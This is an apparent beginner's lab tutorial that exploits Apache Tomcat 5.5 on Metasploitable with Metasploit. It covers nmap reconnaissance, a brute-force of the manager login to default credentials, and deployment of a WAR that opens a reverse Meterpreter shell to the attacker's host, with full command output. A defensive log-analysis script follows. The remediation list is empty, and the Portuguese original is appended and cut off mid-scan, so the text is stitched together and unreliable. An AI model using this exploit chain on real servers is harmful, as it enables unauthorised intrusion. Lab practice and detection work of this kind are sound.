Hi everyone!
I'm starting a series of tutorials here on exploiting some of the most common flaws, aimed at people who are just getting started. If you followed the post on how to set up a lab, you probably have a Linux distro called Metasploitable.
We'll be using its flaws throughout this series. Today's vulnerability is in Apache Tomcat 5.5.
Before we go off exploiting everything, let's first understand what we're attacking.
Apache Tomcat is a collaborative open source project, written in Java, whose job is to be a Java web server. The vulnerability we're going to exploit here exists in several versions, among them 5.5, which is the one running on Metasploitable.
What will we need?
- A victim running a vulnerable version of Apache Tomcat
- A pentest distro with the Metasploit Framework
- A good wordlist
- nmap or any other port scanner
Locating the target
Before exploiting everything in sight, let's do a quick reconnaissance of the terrain. To find the server we'll use nmap. First we run a ping scan to see how many hosts are on the network.
attacker@blackoutlabs:~# nmap -sP 192.168.0.1/24
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:06 BRT
Nmap scan report for 192.168.0.1
Host is up (0.0028s latency).
MAC Address: 00:1E:58:C2:96:0B (D-Link)
Nmap scan report for 192.168.0.100
Host is up (0.065s latency).
MAC Address: D8:A2:5E:8D:BA:AF (Apple)
Nmap scan report for 192.168.0.101
Host is up (0.066s latency).
MAC Address: 1C:4B:D6:4F:C7:3D (AzureWave)
Nmap scan report for 192.168.0.104
Host is up (0.15s latency).
MAC Address: 0C:74:C2:BA:CE:51 (Apple)
Nmap scan report for 192.168.0.105
Host is up (0.071s latency).
MAC Address: A4:D1:D2:0C:EF:F5 (Apple)
Nmap scan report for 192.168.0.106
Host is up.
Nmap scan report for 192.168.0.107
Host is up (0.00050s latency).
MAC Address: C8:9C:DC:44:FC:6A (Elitegroup Computer System CO.)
Nmap scan report for 192.168.0.108
Host is up (0.00048s latency).
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Nmap scan report for 192.168.0.109
Host is up (0.055s latency).
MAC Address: E8:11:32:AD:57:9D (Samsung Electronics Co.)
Nmap done: 256 IP addresses (9 hosts up) scanned in 4.68 seconds
Wow, lots of machines; the whole lab is up.
And now? Which one will be our target?
With nmap again, we scan the IPs one by one until we find our target.
attacker@blackoutlabs:~# nmap -A 192.168.0.108
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:05 BRT
Nmap scan report for 192.168.0.108
Host is up (0.00062s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17 14:07:45
|_Not valid after: 2010-04-16 14:07:45
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_http-title: Site doesn't have a title (text/html).
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-08-24 20:06:02 UTC-4
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.0.108
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.20 seconds
Looks like we found it! Not on the first try; it took me a little while to spot it there, heh...
Now we have some interesting information: Apache Tomcat 5.5 is running on port 8180 (remember that). Now that we know where it is, let's play with it a bit.
Exploiting
To exploit this service we'll use the Metasploit Framework and look for an exploit for Tomcat.
attacker@blackoutlabs:~# msfconsole
_ _
/ \ / \ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
+ -- --=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post]
+ -- --=[ 251 payloads - 28 encoders - 8 nops]
msf> search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
We have some interesting modules here. We'll use tomcat_mgr_login to brute-force the manager login, because before we can break in we need a valid user/pass.
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf (tomcat_mgr_login)> show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
This module needs quite a few settings. We'll add the host we found earlier and the port (remember which one it was? Always pay attention to that). If it finds nothing with the default users and passwords, we point PASS_FILE and USER_FILE at our own wordlists, and if the manager isn't at the default path we'll need to change URI as well.
msf (tomcat_mgr_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf (tomcat_mgr_login) > set RHOSTS 192.168.0.108
RHOSTS => 192.168.0.108
msf (tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_login) > exploit
[*] 192.168.0.108:8180 TOMCAT_MGR - [01/45] - Trying username:'admin' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [01/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [02/45] - Trying username:'manager' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [02/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [03/45] - Trying username:'role1' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [03/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [04/45] - Trying username:'root' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [04/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [05/45] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.0.108:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.0.108:8180 TOMCAT_MGR - [06/45] - Trying username:'both' with password:'both'
[-] 192.168.0.108:8180 TOMCAT_MGR - [06/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [07/45] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.0.108:8180 TOMCAT_MGR - [07/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.0.108:8180 TOMCAT_MGR - [08/45] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] 192.168.0.108:8180 TOMCAT_MGR - [08/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.0.108:8180 TOMCAT_MGR - [09/45] - Trying username:'cxsdk' with password:'cxsdk'
[-] 192.168.0.108:8180 TOMCAT_MGR - [09/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.0.108:8180 TOMCAT_MGR - [10/45] - Trying username:'ADMIN' with password:'ADMIN'
[-] 192.168.0.108:8180 TOMCAT_MGR - [10/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.0.108:8180 TOMCAT_MGR - [11/45] - Trying username:'xampp' with password:'xampp'
[-] 192.168.0.108:8180 TOMCAT_MGR - [11/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.0.108:8180 TOMCAT_MGR - [12/45] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [12/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.0.108:8180 TOMCAT_MGR - [13/45] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.0.108:8180 TOMCAT_MGR - [13/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.0.108:8180 TOMCAT_MGR - [14/45] - Trying username:'root' with password:'owaspbwa'
[-] 192.168.0.108:8180 TOMCAT_MGR - [14/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [15/45] - Trying username:'admin' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [15/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [16/45] - Trying username:'admin' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [16/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [17/45] - Trying username:'admin' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [17/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [18/45] - Trying username:'admin' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [18/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [19/45] - Trying username:'admin' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [19/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [20/45] - Trying username:'manager' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [20/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [21/45] - Trying username:'manager' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [21/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [22/45] - Trying username:'manager' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [22/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [23/45] - Trying username:'manager' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [23/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [24/45] - Trying username:'manager' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [24/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [25/45] - Trying username:'role1' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [25/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [26/45] - Trying username:'role1' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [26/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [27/45] - Trying username:'role1' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [27/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [28/45] - Trying username:'role1' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [28/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [29/45] - Trying username:'role1' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [29/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [30/45] - Trying username:'root' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [30/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [31/45] - Trying username:'root' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [31/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [32/45] - Trying username:'root' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [32/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [33/45] - Trying username:'root' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [33/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [34/45] - Trying username:'root' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [34/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [35/45] - Trying username:'both' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [35/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [36/45] - Trying username:'both' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [36/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [37/45] - Trying username:'both' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [37/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [38/45] - Trying username:'both' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [38/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [39/45] - Trying username:'both' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [39/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [40/45] - Trying username:'both' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [40/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If you look closely at this output, the default wordlist already turned up a working user:pass combination (tomcat:tomcat). We won't even need our own wordlist in this case. It also confirmed that the default manager path is valid, so we don't need to try another one. Now let's look for the real exploit.
msf (tomcat_mgr_login) > search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
The exploit we'll use is tomcat_mgr_deploy, with a reverse_http payload. Let's fill it in with the information we've already gathered.
msf (tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf (tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf (tomcat_mgr_deploy) > set RHOST 192.168.0.108
RHOST => 192.168.0.108
msf (tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf (tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf (tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf (tomcat_mgr_deploy) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http
msf (tomcat_mgr_deploy) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf (tomcat_mgr_deploy) > exploit
[*] Started HTTP reverse handler on http://192.168.0.106:8443/
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6465 bytes as D3YHKcK8TOful.war ...
[*] Executing /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp...
[*] Undeploying D3YHKcK8TOful ...
[*] 192.168.0.108:51231 Request received for /INITJM...
Java: /INITJM
URL: "http://192.168.0.106:8443/FDnj_4IdkGPMI9c8doStx/\x00"
[*] Meterpreter session 2 opened (192.168.0.106:8443 -> 192.168.0.108:51231) at 2012-08-24 20:37:12 -0300
meterpreter >
Done! We're in. Let's run a few commands to confirm.
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > ifconfig
Interface 1
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.0.108
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe45:2ce8
IPv6 Netmask : ::
meterpreter > shell
Process 1 created.
Channel 1 created.
$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
$ whoami
tomcat55
$ ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
$ cd /tmp
$ pwd
/tmp
$ ls
4729.jsvc_up
cache37pgy7jar
cache37pgy8jar
$ halt
halt: Need to be root
And we really are in! The whoami command shows we're running as the tomcat55 user. We can look around and run some commands on the system, but we don't have many privileges, as the last command shows with its "Need to be root". We'd need to escalate privileges and get root access to play further.
But that part is for another post, since this one was only meant to introduce the vulnerability and the exploits.
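Seen from the defender's side, the two modules used above leave a recognisable trail in Tomcat's access log: a burst of 401s on /manager/html, a 200 on the same path right after them, and then a PUT to /manager/deploy followed by /manager/undeploy. The script below, an added example that is not part of the original post, flags those three patterns; the log lines are constructed to mirror this post's run, and the log format assumed is Tomcat's AccessLogValve "common" pattern.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Tomcat AccessLogValve "common" pattern (assumed): %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)

MANAGER_LOGIN = "/manager/html"
# Manager endpoints that change what is deployed: /deploy and /undeploy are the
# ones tomcat_mgr_deploy uses, /html/upload is the browser upload form.
MANAGER_ACTIONS = {
    "/manager/deploy": "manager_deploy",
    "/manager/html/upload": "manager_deploy",
    "/manager/undeploy": "manager_undeploy",
}

# Constructed sample, modelled on the Metasploit run in the post: a burst of
# failed Basic-auth logins on /manager/html (Tomcat logs the user as "-" on a
# 401), one success as "tomcat", then a WAR pushed through /manager/deploy,
# its JSP executed, and the context undeployed again.
SAMPLE_LOG = """\
192.168.0.106 - - [24/Aug/2012:20:30:01 -0300] "GET /manager/html HTTP/1.1" 401 1293
192.168.0.106 - - [24/Aug/2012:20:30:01 -0300] "GET /manager/html HTTP/1.1" 401 1293
192.168.0.106 - - [24/Aug/2012:20:30:02 -0300] "GET /manager/html HTTP/1.1" 401 1293
192.168.0.106 - - [24/Aug/2012:20:30:02 -0300] "GET /manager/html HTTP/1.1" 401 1293
192.168.0.106 - - [24/Aug/2012:20:30:03 -0300] "GET /manager/html HTTP/1.1" 401 1293
192.168.0.106 - tomcat [24/Aug/2012:20:30:03 -0300] "GET /manager/html HTTP/1.1" 200 7581
192.168.0.106 - - [24/Aug/2012:20:30:04 -0300] "GET /manager/html HTTP/1.1" 401 1293
192.168.0.106 - tomcat [24/Aug/2012:20:37:10 -0300] "PUT /manager/deploy?path=/D3YHKcK8TOful HTTP/1.1" 200 72
192.168.0.106 - - [24/Aug/2012:20:37:11 -0300] "GET /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp HTTP/1.1" 200 0
192.168.0.106 - tomcat [24/Aug/2012:20:37:12 -0300] "GET /manager/undeploy?path=/D3YHKcK8TOful HTTP/1.1" 200 70
192.168.0.104 - - [24/Aug/2012:20:40:00 -0300] "GET /index.jsp HTTP/1.1" 200 3468
"""


def parse_line(line):
    """Parse one access-log line; return a dict, or None when it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    return rec


def analyze(lines, threshold=5, window_s=60):
    """Single pass over the log. Reports, per client IP: a run of manager
    login failures inside a sliding time window, a login that succeeds while
    that run is still fresh, and any deploy/undeploy through the manager."""
    findings = []
    failures = defaultdict(deque)   # ip -> timestamps of recent 401s
    flagged = set()                 # ips already reported for brute force
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager"):
            continue
        ip, ts, path, status = rec["ip"], rec["ts"], rec["path"], rec["status"]
        window = failures[ip]
        while window and (ts - window[0]).total_seconds() > window_s:
            window.popleft()        # forget failures older than the window
        if status == 401 and path == MANAGER_LOGIN:
            window.append(ts)
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                findings.append({"type": "manager_bruteforce", "ip": ip,
                                 "failures": len(window)})
        elif status == 200 and path == MANAGER_LOGIN and window:
            findings.append({"type": "login_after_failures", "ip": ip,
                             "user": rec["user"], "failures": len(window)})
            window.clear()          # report the success only once
        elif status == 200 and path in MANAGER_ACTIONS:
            findings.append({"type": MANAGER_ACTIONS[path], "ip": ip,
                             "user": rec["user"],
                             "context": rec["query"].get("path", ["?"])[0]})
    return findings


def run_sample():
    """Analyze the constructed log above."""
    return analyze(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

On a real server the same pass over localhost_access_log would show how far the default-credential scan got and which context the WAR landed in, even after the attacker undeploys it.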
So I've found out how to attack and where to get in, but now what? How do I fix this?
Well, there isn't a lot to do at this point, but here they are:
That's it for today! We've seen one of Metasploitable's flaws, and more are coming soon.
Vou começar aqui uma série de tutoriais, ensinando a exploitar algumas falhas mais comuns, para o pessoal que está começando. Se você seguiu o post de como montar um lab, provavelmente você tem uma distro Linux chamada Metasploitable.
Vamos usar as falhas dela nessa série. A vulnerabilidade de hoje está no Apache Tomcat 5.5.
Antes de sairmos exploitando tudo primeiro vamos saber o que estamos atacando.
O Apache Tomcat é um projeto colaborativo open source, feito em java, e sua função é ser um server web java. Essa vulnerabilidade que vamos explorar aqui pode ser encontrada em algumas versões, entre elas a 5.5 que está rodando no Metasploitable.
O que vamos precisar?
- Vitima rodando uma versão vulnerável do Apache Tomcat
- Distro de pentest com o Framework Metasploit
- Uma boa wordlist
- nmap ou qualquer outro port scanner
Localizando o alvo
Antes de sair exploitando tudo o que ver pela frente vamos fazer um rápido reconhecimento do terreno. Para encontrar o server vamos usar o nmap. Primeiramente vamos fazer um ping scan para ver quantos hosts estão na rede.
attacker@blackoutlabs:~# nmap -sP 192.168.0.1/24
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:06 BRT
Nmap scan report for 192.168.0.1
Host is up (0.0028s latency).
MAC Address: 00:1E:58:C2:96:0B (D-Link)
Nmap scan report for 192.168.0.100
Host is up (0.065s latency).
MAC Address: D8:A2:5E:8D:BA:AF (Apple)
Nmap scan report for 192.168.0.101
Host is up (0.066s latency).
MAC Address: 1C:4B:D6:4F:C7:3D (AzureWave)
Nmap scan report for 192.168.0.104
Host is up (0.15s latency).
MAC Address: 0C:74:C2:BA:CE:51 (Apple)
Nmap scan report for 192.168.0.105
Host is up (0.071s latency).
MAC Address: A4:D1:D2:0C:EF:F5 (Apple)
Nmap scan report for 192.168.0.106
Host is up.
Nmap scan report for 192.168.0.107
Host is up (0.00050s latency).
MAC Address: C8:9C:DC:44:FC:6A (Elitegroup Computer System CO.)
Nmap scan report for 192.168.0.108
Host is up (0.00048s latency).
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Nmap scan report for 192.168.0.109
Host is up (0.055s latency).
